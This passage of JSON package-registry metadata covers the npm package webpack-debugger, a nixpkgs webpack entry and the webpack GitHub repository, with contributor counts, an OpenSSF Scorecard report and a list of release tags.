1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-debugger/codemeta","maintainers":[{"uuid":"zhufengnodejs","login":"zhufengnodejs","name":null,"email":"zhufengnodejs@126.com","url":null,"packages_count":12,"html_url":"https://www.npmjs.com/~zhufengnodejs","role":null,"created_at":"2022-11-15T10:39:51.865Z","updated_at":"2022-11-15T10:39:51.865Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zhufengnodejs/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13065068,"name":"nodePackages_latest.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:05:13.338Z","latest_release_published_at":"2026-02-01T17:05:13.338Z","latest_release_number":"5.94.0","last_synced_at":"2026-03-09T06:19:04.501Z","created_at":"2026-02-01T17:05:06.375Z","updated_at":"2026-08-23T22:03:38.520Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=nodePackages_latest.webpack","install_command":"nix-env -iA nixpkgs.nodePackages_latest.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/node-packages/node-packages.nix#L87845","metadata":{"nix_attribute":"webpack-5.94.0","position":"pkgs/development/node-packages/node-packages.nix:87845","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori